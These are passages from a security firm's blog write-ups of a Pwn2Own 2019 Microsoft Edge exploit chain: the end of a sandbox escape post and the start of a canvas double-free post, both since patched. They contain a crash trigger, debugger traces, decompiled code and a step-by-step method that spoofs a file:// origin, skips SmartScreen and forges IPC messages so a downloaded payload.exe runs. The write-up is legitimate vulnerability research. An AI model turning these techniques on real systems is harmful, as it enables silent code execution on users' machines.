02 0000005d`65cfe9b0 00007ffe`af696b1d EMODEL!CDownloadSecurity::_SendStateChangeMessage+0xe0
03 0000005d`65cfead0 00007ffe`af6954f5 EMODEL!CDownloadSecurity::_OnSecurityChecksComplete+0xa5
04 0000005d`65cfeb00 00007ffe`af6878c8 EMODEL!CDownloadSecurity::OnSecurityCheckCallback+0x45
05 0000005d`65cfeb30 00007ffe`af686dc2 EMODEL!CDownloadManager::OnDownloadSecurityCallback+0x58
06 0000005d`65cfeb70 00007ffe`af4604b7 EMODEL!CDownloadManager::HandleDownloadMessage+0x11e
07 0000005d`65cfed40 00007ffe`d469cccf EMODEL!LCIEAuthority::LCIEAuthorityManagerWinProc+0x2067
08 0000005d`65cff410 00007ffe`d469d830 edgeIso!IsoDispatchMessageToArtifacts+0x54f
09 0000005d`65cff520 00007fff`08506d41 edgeIso!_IsoThreadMessagingWindowProc+0x1f0

The last message sent is important as well: it has the identifier 0xd6b and it initiates running the file. An excerpt from the debugger log file looks like the following:

edgeIso!IsoPostMessage (00007ffe`d46ad8c0)(00000402, 00000402, 00000d6b, ...)
 # Child-SP          RetAddr           Call Site
00 0000005d`656fefc8 00007ffe`af62b4c6 edgeIso!IsoPostMessage
01 0000005d`656fefd0 00007ffe`af62b962 EMODEL!TFlatIsoMessage<DownloadOperation>::Post+0x9a
02 0000005d`656ff040 00007ffe`af62b7bf EMODEL!SpartanCore::DownloadsHandler::SendCommand+0x4e
03 0000005d`656ff0b0 00007ffe`af62ac07 EMODEL!SpartanCore::DownloadsHandler::ReportLaunchFailure+0xc3
04 0000005d`656ff110 00007ffe`af43be99 EMODEL!SpartanCore::DownloadsHandler::InvokeCommand+0x117
05 0000005d`656ff190 00007ffe`af43f0c3 EMODEL!CLayerBase::InvokeCommand+0x159
06 0000005d`656ff210 00007ffe`af43e78a EMODEL!CAsyncBoundaryLayer::_ProcessRequest+0x503
07 0000005d`656ff340 00007fff`08506d41 EMODEL!CAsyncBoundaryLayer::s_WndProc+0x19a
08 0000005d`656ff480 00007fff`08506713 USER32!UserCallWinProcCheckWow+0x2c1
09 0000005d`656ff610 00007fff`016ffef4 USER32!DispatchMessageWorker+0x1c3

The message sent by SpartanCore::DownloadsHandler::SendCommand() is spoofed by the exploit code.

Exploit Development

The exploit code is implemented entirely in JavaScript and calls the required native functions from JavaScript.

The exploitation process can be divided into the following stages:

  1. changing location origin of the current document
  2. executing the JavaScript code which offers to run the download file
  3. posting a message to the Manager process which triggers the file to be run
  4. restoring original location.

Depending on the location of the site, the Edge browser may warn the user about a potentially unsafe file download. In the case of internet sites, the user is always warned. The Edge browser also checks the referrer of the download and may refuse to run the downloaded file even when the user has explicitly chosen to run the file. Additionally, the downloaded file is scanned with Microsoft Windows Defender SmartScreen, which blocks any file from running if the file is considered malicious. This prevents a successful attack.

However, when a download is initiated from the “file://” URL and the download referrer is also from the secure zone (or without a zone as is the case with the “blob:” protocol), the downloaded file is not marked with the “Mark of the Web” (MotW). This completely bypasses checks by Microsoft Defender SmartScreen and allows running the downloaded file without any restrictions.

For the first step the exploit finds the current site URL and overwrites it with a “file:///” zone URL. The URL of the site is found by reading relevant pointers in memory. After the site URL is overwritten, the renderer process treats any download that is coming from the current site as coming from the “file:///” zone.

For the second step the exploit executes the JavaScript code which fetches the download file from the remote server and offers it as a download:

let anchorElement = document.createElement('a');
fetch('payload.bin').then((response) => {
  response.blob().then(
    (blobData) => {
      anchorElement.href = URL.createObjectURL(blobData);
      anchorElement.download = 'payload.exe';
      anchorElement.click();
    }
  );
});

The executed JavaScript initiates the file download and internally the Edge browser caches the file and keeps a temporary copy as long as the user has not responded to the download notification bar. Before any file download, a Globally Unique Identifier (GUID) is created for the actual download file. The Edge browser recognizes downloads not by the filename or the path, but by the download GUID. Messages which send commands to do any file operation must pass the GUID of the actual file. Therefore it is required to find the actual file download GUID. The required GUID is created by the content process during the call to EdgeContent!CDownloadState::Initialize():

.text:0000000180058CF0 public: long CDownloadState::Initialize(class CInterThreadMarshal *, struct IStream *, unsigned short const *, struct _GUID const &, unsigned short const *, struct IFetchDownloadContext *) proc near
...
.text:0000000180058E6F loc_180058E6F:
.text:0000000180058E6F                 mov     edi, 8007000Eh
.text:0000000180058E74                 test    rbx, rbx
.text:0000000180058E77                 jz      loc_180058FF0
.text:0000000180058E7D                 test    r13b, r13b
.text:0000000180058E80                 jnz     short loc_180058E93
.text:0000000180058E82                 lea     rcx, [rsi+74h]  ; pguid
.text:0000000180058E86                 call    cs:__imp_CoCreateGuid

Next follows the call to EdgeContent!DownloadStateProgress::LCIESendToDownloadManager(). This function packs all the relevant download data (such as the current URL, path to the cache file, the referrer, name of the file, and the MIME type of the file), adds padding for the metadata, creates the so-called “message buffer” and sends it to the Manager process via a call to LCIEPostMessage(). As this message is posted to another process, all the data is eventually placed in the shared memory section and is available for reading and writing by both the content and Manager processes. The message buffer is eventually populated with the download file GUID.

The described operation performed by DownloadStateProgress::LCIESendToDownloadManager() is important for the exploit as it indirectly leaks the address of the message buffer and the relevant download file GUID.

The allocation address of the message buffer depends on the size of the message. There are several ranges of sizes:

  • 0x0 to 0x20 bytes: unsupported (message posting fails)
  • 0x20 to 0x1d0 bytes: first slot
  • 0x1d4 to 0xfd0 bytes: second slot
  • from 0x1fd4 bytes: last slot
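
The ranges above can be written down as a small classifier. This is a hypothetical sketch built only from the listed sizes: it assumes that a size of exactly 0x20 is accepted, and it reports sizes that the list does not cover as "unspecified" instead of guessing; messageSlot is not a function from edgeIso.

```javascript
// Hypothetical classifier built from the listed ranges. Assumptions: a size
// of exactly 0x20 is accepted, and sizes the list does not cover are
// reported as "unspecified" rather than guessed.
function messageSlot(size) {
  if (size < 0x20) return "unsupported";
  if (size <= 0x1d0) return "first";
  if (size >= 0x1d4 && size <= 0xfd0) return "second";
  if (size >= 0x1fd4) return "last";
  return "unspecified";
}

console.log(messageSlot(0x10));   // "unsupported"
console.log(messageSlot(0x48));   // "first"
console.log(messageSlot(0x400));  // "second"
console.log(messageSlot(0x2000)); // "last"
```

Two messages that fall into the same slot are candidates for reusing the same address once the earlier one has been freed.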

If the previous message with the same size slot was freed, the new message is allocated at the same address. The specifics of the message buffer allocator allow leaking the address of the next buffer without the risk of failure. After the file download is triggered, the exploit gets the address of the message buffer. After the address of the message buffer is retrieved, it is possible to parse the message buffer and extract relevant data (such as the cache path and the file download GUID).

The last important step is to send a message which triggers the browser to run the downloaded file (the actual file operation is performed by the browser broker “browser_broker.exe”) with Medium Integrity Level. The exploit code which performs the current step is borrowed from eModel!TFlatIsoMessage<DownloadOperation>::Post():

__int64 __fastcall TFlatIsoMessage<DownloadOperation>::Post(
    unsigned int a1,
    unsigned int a2,
    __int64 a3,
    __int64 a4,
    __int64 a5
)
{
    unsigned int v5; // esi
    unsigned int v6; // edi
    signed int result; // ebx
    __int64 isoMessage_; // r8
    __m128i threadStateGUID; // xmm0
    unsigned int v11; // [rsp+20h] [rbp-48h]
    __int128 tmpThreadStateGUID; // [rsp+30h] [rbp-38h]
    __int64 isoMessage; // [rsp+40h] [rbp-28h]
    unsigned int msgBuffer; // [rsp+48h] [rbp-20h]

    v5 = a2;
    v6 = a1;
    result = IsoAllocMessageBuffer(a1, &msgBuffer, 0x48u, &isoMessage);
    if ( result >= 0 )
    {
        isoMessage_ = isoMessage;
        *(isoMessage + 0x20) = *a5;
        *(isoMessage_ + 0x30) = *(a5 + 0x10);
        *(isoMessage_ + 0x40) = *(a5 + 0x20);
        threadStateGUID = *GlobalThreadState();
        v11 = msgBuffer;
        _mm_storeu_si128(&tmpThreadStateGUID, threadStateGUID);
        result = IsoPostMessage(v6, v5, 0xD6Bu, 0, v11, &tmpThreadStateGUID);
        if ( result < 0 )
        {
            IsoFreeMessageBuffer(msgBuffer);
        }
    }
    return result;
}
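
The buffer layout implied by the decompiled function can be modeled with a typed array. This is a sketch under assumptions: the 0x48 size and the 0x20 destination offset come from the listing above, while the payload width of 0x28 bytes is inferred from those two numbers, and packMessage is a hypothetical name.

```javascript
// Hypothetical layout model; offsets and the 0x48 size come from the
// decompiled function, the payload width is an inference.
const MESSAGE_SIZE = 0x48;
const PAYLOAD_OFFSET = 0x20;
const PAYLOAD_SIZE = MESSAGE_SIZE - PAYLOAD_OFFSET; // 0x28

function packMessage(payload) {
  if (payload.length !== PAYLOAD_SIZE) {
    throw new RangeError(`payload must be ${PAYLOAD_SIZE} bytes`);
  }
  const message = new Uint8Array(MESSAGE_SIZE); // first 0x20 bytes left zeroed
  message.set(payload, PAYLOAD_OFFSET);
  return message;
}

// Fill the payload with 1..0x28 so the copied range is easy to spot.
const payload = Uint8Array.from({ length: PAYLOAD_SIZE }, (_, i) => i + 1);
const message = packMessage(payload);
console.log(message.length.toString(16), message[0x20], message[0x47]); // 48 1 40
```

The first 0x20 bytes are not written by Post() in the listing, so the model leaves them zeroed rather than guessing their contents.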

Last, the exploit recovers the original site URL to avoid any potential artifacts and sends messages to remove the download notification bar.

Open problems

The only issue with the exploit is that a small popup will appear for a split second before the exploit has sent a message to click the popup button. Potentially it is possible to avoid this popup by sending a different set of messages which does not require a popup to be present.

Detection

There are no trivial methods to detect exploitation of the described vulnerability as the exploit code does not require any kind of particularly notable data and is not performing any kind of exceptional activity.

Mitigation

The exploit is developed in JavaScript, but it is possible to develop an exploit that is not based on JavaScript, which makes it non-trivial to mitigate the issue with 100% certainty.

For exploits developed in JavaScript, it is possible to mitigate this issue by disabling JavaScript.

The described vulnerability was patched by Microsoft in the May updates.

Conclusion

The sandbox escape exploit part is 100% reliable and portable—thus requiring almost no effort to keep it compatible with different browser versions.

Here is the video demonstrating the full exploit-chain in action:

For demonstration purposes, the exploit payload writes a file named “w00t.txt” to the user desktop, opens this file with notepad and shows a message box with the integrity level of the “payload.exe”.

Subscribers of the Exodus 0day Feed had access to this exploit for penetration tests and implementing protections for their stakeholders.

The post Pwn2Own 2019: Microsoft Edge Sandbox Escape (CVE-2019-0938). Part 2 appeared first on Exodus Intelligence.

Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1

19 May 2019 at 16:41

By Arthur Gerkis

This year Exodus Intelligence participated in the Pwn2Own competition in Vancouver. The chosen target was the Microsoft Edge browser and a full-chain browser exploit was successfully demonstrated. The exploit consisted of two parts:

  • renderer double-free vulnerability exploit achieving arbitrary read-write
  • logical vulnerability sandbox escape exploit achieving arbitrary code execution with Medium Integrity Level

This blog post describes the exploitation of the double-free vulnerability in the renderer process of Microsoft Edge 64-bit. Part 2 will describe the sandbox escape vulnerability.

The Vulnerability

The vulnerability is located in the Canvas 2D API component which is responsible for creating canvas patterns. The crash is triggered with the following JavaScript code:

let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d');

// Allocate canvas pattern objects and populate hash table.
for (let i = 0; i < 31; i++) {
  ctx.createPattern(canvas, 'no-repeat');
}

// Here the canvas pattern objects will be freed.
gc();

// This is causing internal OOM error.
canvas.setAttribute('height', 0x4000);
canvas.setAttribute('width', 0x4000);

// This will partially initialize canvas pattern object and trigger double-free.
try {
  ctx.createPattern(canvas, 'no-repeat');
} catch (e) {

}

If you run this test case, you may notice that the crash does not always happen; several attempts may be required. The reason is explained in one of the following sections.

With the page heap enabled, the crash would look like this:

(470.122c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh ds:00000249`2681fff8=????????
0:016> r
rax=000002490563a4a0 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000000000 rsi=000000798c7fa710 rdi=000002492681fff0
rip=00007ffd2e5cd820 rsp=000000798c7fa680 rbp=0000000000000000
 r8=0000000000000000  r9=0000024909747758 r10=0000000000000000
r11=0000000000000025 r12=00007ffd2e999310 r13=0000024904993930
r14=0000024909747758 r15=0000000000000002
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh ds:00000249`2681fff8=????????
0:016> k L7
 # Child-SP          RetAddr           Call Site
00 00000079`8c7fa680 00007ffd`2e5c546d edgehtml!TDispResourceCache<CDispNoLock,1,0>::Remove+0x60
01 00000079`8c7fa6b0 00007ffd`2f054ad8 edgehtml!CDXSystemShared::RemoveDisplayResourceFromCache+0x6d
02 00000079`8c7fa710 00007ffd`2f054b54 edgehtml!CCanvasPattern::~CCanvasPattern+0x34
03 00000079`8c7fa740 00007ffd`2e7ac4d9 edgehtml!CCanvasPattern::`vector deleting destructor'+0x14
04 00000079`8c7fa770 00007ffd`2eb2703c edgehtml!CBase::PrivateRelease+0x159
05 00000079`8c7fa7b0 00007ffd`2f053584 edgehtml!TSmartPointer<CCanvasPattern,CStrongReferenceTraits,CCanvasPattern * __ptr64>::~TSmartPointer<CCanvasPattern,CStrongReferenceTraits,CCanvasPattern * __ptr64>+0x18
06 00000079`8c7fa7e0 00007ffd`2f050755 edgehtml!CCanvasRenderingProcessor2D::CreatePatternInternal+0xd8
0:016> ub @rip;u @rip
edgehtml!TDispResourceCache::Remove+0x46:
00007ffd`2e5cd806 488b742440      mov     rsi,qword ptr [rsp+40h]
00007ffd`2e5cd80b 488b7c2448      mov     rdi,qword ptr [rsp+48h]
00007ffd`2e5cd810 4883c420        add     rsp,20h
00007ffd`2e5cd814 415e            pop     r14
00007ffd`2e5cd816 c3              ret
00007ffd`2e5cd817 488b7808        mov     rdi,qword ptr [rax+8]
00007ffd`2e5cd81b 4885ff          test    rdi,rdi
00007ffd`2e5cd81e 74d5            je      edgehtml!TDispResourceCache<CDispNoLock,1,0>::Remove+0x35 (00007ffd`2e5cd7f5)
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh
00007ffd`2e5cd824 488b0f          mov     rcx,qword ptr [rdi]
00007ffd`2e5cd827 0f85dbe04e00    jne     edgehtml!TDispResourceCache<CDispNoLock,1,0>::Remove+0x4ee148 (00007ffd`2eabb908)
00007ffd`2e5cd82d 48891f          mov     qword ptr [rdi],rbx
00007ffd`2e5cd830 488bd5          mov     rdx,rbp
00007ffd`2e5cd833 48890e          mov     qword ptr [rsi],rcx
00007ffd`2e5cd836 498bce          mov     rcx,r14
00007ffd`2e5cd839 e8b2f31500      call    edgehtml!CHtPvPvBaseT<&nullCompare,HashTableEntry>::Remove (00007ffd`2e72cbf0)
0:016> !heap -p -a @rdi
    address 000002492681fff0 found in
    _DPH_HEAP_ROOT @ 2497e601000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                249259795b0:      2492681f000             2000
    00007ffd51857608 ntdll!RtlDebugFreeHeap+0x000000000000003c
    00007ffd517fdd5e ntdll!RtlpFreeHeap+0x000000000009975e
    00007ffd5176286e ntdll!RtlFreeHeap+0x00000000000003ee
    00007ffd2e5cd871 edgehtml!TDispResourceCache<CDispNoLock,1,0>::CacheEntry::`scalar deleting destructor'+0x0000000000000021
    00007ffd2e5cd846 edgehtml!TDispResourceCache<CDispNoLock,1,0>::Remove+0x0000000000000086
    00007ffd2e5c546d edgehtml!CDXSystemShared::RemoveDisplayResourceFromCache+0x000000000000006d
    00007ffd2f054ad8 edgehtml!CCanvasPattern::~CCanvasPattern+0x0000000000000034
    00007ffd2f054b54 edgehtml!CCanvasPattern::`vector deleting destructor'+0x0000000000000014
    00007ffd2e7ac4d9 edgehtml!CBase::PrivateRelease+0x0000000000000159
    00007ffd2e89f579 edgehtml!CJScript9Holder::CBaseFinalizer+0x00000000000000a9
    00007ffd2de66f5d chakra!Js::CustomExternalObject::Dispose+0x000000000000002d
    00007ffd2de3c012 chakra!Memory::SmallFinalizableHeapBlockT<SmallAllocationBlockAttributes>::ForEachPendingDisposeObject<<lambda_37407f4cdaf1d704a79fcdd974872764> >+0x0000000000000092
    00007ffd2de3bf0b chakra!Memory::HeapInfo::DisposeObjects+0x000000000000013b
    00007ffd2de81faa chakra!Memory::Recycler::DisposeObjects+0x0000000000000096
    00007ffd2de81e9a chakra!ThreadContext::DisposeObjects+0x000000000000004a
    00007ffd2dd5ac35 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000000000003a5
    00007ffd2dea7956 chakra!amd64_CallFunction+0x0000000000000086
    00007ffd2dd5f9d0 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x00000000000002f0
    00007ffd2dd5fac8 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0x00000000000000b8
    00007ffd2dd5fd41 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000161
    00007ffd2dd48a21 chakra!Js::InterpreterStackFrame::Process+0x00000000000000e1
    00007ffd2dd486ff chakra!Js::InterpreterStackFrame::InterpreterHelper+0x000000000000088f
    00007ffd2dd4775e chakra!Js::InterpreterStackFrame::InterpreterThunk+0x000000000000004e
    00000249226f1fb2 +0x00000249226f1fb2

Vulnerability Analysis

The JavaScript createPattern() method triggers the native CCanvasRenderingProcessor2D::CreatePatternInternal() call:

__int64 __fastcall CCanvasRenderingProcessor2D::CreatePatternInternal(
	CCanvasRenderingProcessor2D *this,
	struct CBase *a2,
	const unsigned __int16 *a3,
	struct CCanvasPattern **a4)
{
    CCanvasRenderingProcessor2D *this_; // rsi
    struct CCanvasPattern **v5; // r14
    const unsigned __int16 *v6; // rbp
    struct CBase *v7; // r15
    void *ptr; // rax
    CBaseScriptable *canvasPattern; // rbx
    struct CSecurityContext *v10; // rax
    signed int hr; // edi
    CBaseScriptable *canvasPattern_; // [rsp+30h] [rbp-28h]

    this_ = this;
    v5 = a4;
    v6 = a3;
    v7 = a2;
    ptr = MemoryProtection::HeapAllocClear<1>(0x50ui64);
    canvasPattern = Abandonment::CheckAllocationUntyped(ptr, 0x50ui64);
    if ( canvasPattern )
    {
        v10 = Tree::ANode::SecurityContext(*(*(this_ + 1) + 0x30i64));
        CBaseScriptable::CBaseScriptable(canvasPattern, v10);
        *canvasPattern = &CCanvasPattern::`vftable`;
        *(canvasPattern + 7) = 0i64; // `CCanvasPattern::Data`
        *(canvasPattern + 8) = 0i64;
        *(canvasPattern + 0x12) = 0;
    }
    else
    {
        canvasPattern = 0i64;
    }
    canvasPattern_ = canvasPattern;
    hr = CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget(this_, 0); // this may fail
    if ( hr >= 0 )
    {
        CCanvasRenderingProcessor2D::ResetSurfaceWithLayoutScaling(this_);
        hr = CCanvasPattern::Initialize(canvasPattern, v7, v6, *(*(this_ + 1) + 0x30i64), *(this_ + 0x20));
        if ( hr >= 0 )
        {
            if ( *(canvasPattern + 0x4C) )
            {
                canvasPattern = 0i64;
            }
            else
            {
                canvasPattern_ = 0i64;
            }
            *v5 = canvasPattern;
        }
    }
    TSmartPointer<CMediaStreamError,CStrongReferenceTraits,CMediaStreamError *>::~TSmartPointer<CMediaStreamError,CStrongReferenceTraits,CMediaStreamError *>(&canvasPattern_);
    return hr;
}

On line 21 the heap manager allocates space for the canvas pattern object, and on the following lines certain members are set to 0. Note that on line 28 the CCanvasPattern::Data member is only zeroed; it does not yet point to a CCanvasPattern::Data object.

Next follows a call to the CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method, which is responsible for video memory allocation for the canvas pattern object on a target device. In certain cases this method returns an error. For this vulnerability, the bug is triggered when the Windows GDI function D3DKMTCreateAllocation() returns the error STATUS_GRAPHICS_NO_VIDEO_MEMORY (error code 0xc01e0100). Setting the width and height of the canvas object to huge values can cause the video device to return an out-of-memory error. The following call stack shows the path taken after the width and height of the canvas object have been set to large values and createPattern() has been called several times in a row:

Breakpoint 1 hit
GDI32!D3DKMTCreateAllocation:
00007ffe`67a72940 48895c2420      mov     qword ptr [rsp+20h],rbx ss:000000b3`f59f82b8=000000000000b670
0:015> k
 # Child-SP          RetAddr           Call Site
00 000000b3`f59f8298 00007ffe`61fd598e GDI32!D3DKMTCreateAllocation
01 000000b3`f59f82a0 00007ffe`61fd39b5 d3d11!CallAndLogImpl<long (__cdecl*)(_D3DKMT_CREATEALLOCATION * __ptr64),_D3DKMT_CREATEALLOCATION * __ptr64>+0x1e
02 000000b3`f59f8300 00007ffe`605a1b4f d3d11!NDXGI::CDevice::AllocateCB+0x105
03 000000b3`f59f84c0 00007ffe`605a24dc vm3dum64_10+0x1b4f
04 000000b3`f59f8540 00007ffe`605ab258 vm3dum64_10+0x24dc
05 000000b3`f59f86a0 00007ffe`605ac163 vm3dum64_10!OpenAdapterWrapper+0x1b8c
06 000000b3`f59f8750 00007ffe`61fc3ce2 vm3dum64_10!OpenAdapterWrapper+0x2a97
07 000000b3`f59f87d0 00007ffe`61fc3a13 d3d11!CResource<ID3D11Texture2D1>::CLS::FinalConstruct+0x2b2
08 000000b3`f59f8b70 00007ffe`61fb98ba d3d11!TCLSWrappers<CTexture2D>::CLSFinalConstructFn+0x43
09 000000b3`f59f8bb0 00007ffe`61fbd107 d3d11!CDevice::CreateLayeredChild+0x2bca
0a 000000b3`f59fa410 00007ffe`61fbcf73 d3d11!NDXGI::CDeviceChild<IDXGIResource1,IDXGISwapChainInternal>::FinalConstruct+0x43
0b 000000b3`f59fa480 00007ffe`61fbca1c d3d11!NDXGI::CResource::FinalConstruct+0x3b
0c 000000b3`f59fa4d0 00007ffe`61fbd3c0 d3d11!NDXGI::CDevice::CreateLayeredChild+0x1bc
0d 000000b3`f59fa640 00007ffe`61fb43bb d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0e 000000b3`f59fa820 00007ffe`61fb297c d3d11!CDevice::CreateTexture2D_Worker+0x4cb
0f 000000b3`f59fade0 00007ffe`46cd68db d3d11!CDevice::CreateTexture2D+0xac
10 000000b3`f59fae70 00007ffe`46cd3dcd edgehtml!CDXResourceDomain::CreateTexture+0xfb
11 000000b3`f59faf20 00007ffe`46cd3d5e edgehtml!CDXSystem::CreateTexture+0x59
12 000000b3`f59faf70 00007ffe`46ed2dda edgehtml!CDXTextureTargetSurface::OnEnsureResources+0x15e
13 000000b3`f59fb010 00007ffe`46ed2e78 edgehtml!CDXTargetSurface::EnsureResources+0x32
14 000000b3`f59fb050 00007ffe`46ed2c71 edgehtml!CDXRenderTarget::EnsureResources+0x68
15 000000b3`f59fb0a0 00007ffe`46da4ba4 edgehtml!CDXRenderTarget::BeginDraw+0x81
16 000000b3`f59fb100 00007ffe`470180b5 edgehtml!CDXTextureRenderTarget::BeginDraw+0x34
17 000000b3`f59fb170 00007ffe`46cd8033 edgehtml!CDispSurface::BeginDraw+0xf5
18 000000b3`f59fb1d0 00007ffe`46cd7fa6 edgehtml!CCanvasRenderingProcessor2D::OpenBitmapRenderTarget+0x6b
19 000000b3`f59fb230 00007ffe`47831881 edgehtml!CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget+0x52
1a 000000b3`f59fb260 00007ffe`4782eaa5 edgehtml!CCanvasRenderingProcessor2D::CreatePatternInternal+0x85
1b 000000b3`f59fb2c0 00007ffe`47539d46 edgehtml!CCanvasRenderingContext2D::Var_createPattern+0xc5
1c 000000b3`f59fb330 00007ffe`47174135 edgehtml!CFastDOM::CCanvasRenderingContext2D::Trampoline_createPattern+0x52
1d 000000b3`f59fb380 00007ffe`464dc47e edgehtml!CFastDOM::CCanvasRenderingContext2D::Profiler_createPattern+0x25
0:015> pt
GDI32!D3DKMTCreateAllocation+0x18e:
00007ffe`67a72ace c3              ret
0:015> r
rax=00000000c01e0100 rbx=000000b3f59f8508 rcx=1756445c6ae30000
rdx=0000000000000000 rsi=0000000000000000 rdi=00007ffe62186ae0
rip=00007ffe67a72ace rsp=000000b3f59f8298 rbp=000000b3f59f8530
 r8=000000b3f59f81c8  r9=000000b3f59f84e0 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=000002ae9f3326c8 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
GDI32!D3DKMTCreateAllocation+0x18e:
00007ffe`67a72ace c3              ret

A requirement to trigger the error is that the target hardware has an integrated video card or a video card with low memory. Such conditions are met on the VMware graphics pseudo-hardware or on some budget devices. It may also be possible to trigger other errors that do not depend on the target hardware resources.
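
The hr >= 0 checks in CreatePatternInternal() only make sense when the status is read as a signed 32-bit value. The following minimal sketch shows that interpretation for status codes that appear in this post. The helper name succeeded is made up for illustration, and the post does not state which exact value EnsureBitmapRenderTarget() hands back to its caller.

```javascript
// Hypothetical helper: mirrors the decompiled `hr >= 0` test by
// reinterpreting an unsigned 32-bit status as a signed 32-bit integer.
function succeeded(status) {
  return (status | 0) >= 0; // `| 0` converts the number to int32
}

// Value taken from rax in the register dump above.
const STATUS_GRAPHICS_NO_VIDEO_MEMORY = 0xc01e0100;

console.log(succeeded(0));                               // true
console.log(succeeded(STATUS_GRAPHICS_NO_VIDEO_MEMORY)); // false
console.log(succeeded(0x8070000c));                      // false
```

Any status with the top bit set is negative as a signed integer, so the Initialize() call is skipped for it.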

Under normal conditions (i.e. the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method does not return any error) the CCanvasPattern::Initialize() method is called:

__int64 __fastcall CCanvasPattern::Initialize(
	CCanvasPattern *this,
	struct CBase *a2,
	const unsigned __int16 *a3,
	struct CHTMLCanvasElement *a4,
	struct CDispSurface *dispSurface
)
{
    struct CHTMLCanvasElement *canvasElement; // rbp
    const unsigned __int16 *v6; // rsi
    struct CBase *base; // rdi
    CCanvasPattern *this_; // rbx
    void *ptr; // rax
    char *canvasPatternData; // rax
    __int64 v11; // rdx
    __int64 v12; // r8
    __int64 v13; // rcx
    int initKind; // eax

    canvasElement = a4;
    v6 = a3;
    base = a2;
    this_ = this;

    // code omitted for brevity

    ptr = MemoryProtection::HeapAlloc<0>(0x20ui64);
    canvasPatternData = Abandonment::CheckAllocationUntyped(ptr, 0x20ui64);
    if ( canvasPatternData )
    {
        *(canvasPatternData + 0xC) = 0i64;
        *canvasPatternData = &RefCounted<CCanvasPattern::Data,MultiThreadedRefCount>::`vftable`;
        *(canvasPatternData + 6) = 1;
    }
    else
    {
        canvasPatternData = 0i64;
    }

    *(this_ + 7) = canvasPatternData; // member initialized
    // code omitted for brevity

    if ( v6 && *v6 )
    {
        if ( !MapCanvasStringToEnum<enum  CCanvasPattern::Repetition>(v6, v11, v12, (*(this_ + 7) + 8i64)) )
        {
            return 0x8070000Ci64;
        }
    }
    else
    {
        *(*(this_ + 7) + 8i64) = 0;
    }

    // code omitted for brevity

    initKind = (*(*base + 0x2A8i64))(base);
    switch ( initKind )
    {
        case 0x10C7:
            return CCanvasPattern::InitializeFromImage(this_, base, canvasElement, dispSurface);
        case 0x10B4:
            return CCanvasPattern::InitializeFromCanvas(this_, base); // is called
        case 0x10F1:
            return CCanvasPattern::InitializeFromVideo(this_, base);
    }
    return 0x80700011i64;
}

On line 40 one of the canvas pattern object members is set to point to the CCanvasPattern::Data object.

During the call to the CCanvasPattern::InitializeFromCanvas() method, a chain of calls follows. This eventually leads to a call of the following method:

__int64 __fastcall CDXSystemShared::AddDisplayResourceToCache(
	__int64 a1,
	__int64 a2,
	__int64 a3,
	_BYTE *a4,
	unsigned int a5
)
{
    __int64 v5; // rsi
    __int64 v6; // rbp
    _BYTE *v7; // rdi
    __int64 v8; // r14
    unsigned int v9; // ebx
    void (__fastcall ***v11)(_QWORD, __int64, _BYTE *); // [rsp+20h] [rbp-28h]
    void **v12; // [rsp+28h] [rbp-20h]
    __int64 v13; // [rsp+30h] [rbp-18h]
    char v14; // [rsp+38h] [rbp-10h]

    v5 = a2;
    v13 = 0i64;
    v6 = a1;
    v12 = &CDXRenderLock::`vftable`;
    v14 = 1;
    v7 = a4;
    v8 = a3;
    CDXRenderLockBase::Acquire(&v12, 2);
    if ( a5 != 2 || (*(*v7 + 0x18i64))(v7) == 0x8210 || (*(*v7 + 0x18i64))(v7) == 0x16 && v7[0x144] & 4 )
    {
        v9 = CDXSystemShared::GetResourceCache(v6, v5, a5, &v11);
        if ( (v9 & 0x80000000) == 0 )
        {
            (**v11)(v11, v8, v7); // TDispResourceCache<CDispNoLock,1,0>::Add
        }
    }
    else
    {
        v9 = 0x8000FFFF;
    }
    TSmartResource<CDXRenderLock>::~TSmartResource<CDXRenderLock>(&v12);
    return v9;
}

The above method adds a display resource to the cache. In the current case, the display resource is the DXImageRenderTarget object and the cache is a hash table which is implemented in the TDispResourceCache class.

On line 32 the call to the TDispResourceCache<CDispNoLock,1,0>::Add() method happens:

HashTableEntry *__fastcall TDispResourceCache<CDispNoLock,1,0>::Add(
	__int64 resourceCache,
	unsigned __int64 key,
	__int64 arg_DXImageRenderTarget
)
{
    __int64 entries; // rbp
    __int64 DXImageRenderTarget; // rdi
    unsigned __int64 entryKey; // rsi
    HashTableEntry *result; // rax
    VulnObject *hashTableEntryValue; // rbx
    void *ptr; // rax
    VulnObject *newHashTableEntryValue; // rax
    char v10; // [rsp+30h] [rbp+8h]

    entries = resourceCache + 0x10;
    DXImageRenderTarget = arg_DXImageRenderTarget;
    entryKey = key;
    result = CHtPvPvBaseT<&int nullCompare(void const *,void const *,void const *,bool),HashTableEntry>::FindEntry((resourceCache + 0x10), key);
    hashTableEntryValue = 0i64;
    if ( result )
    {
        hashTableEntryValue = result->value;
    }
    if ( !hashTableEntryValue )
    {
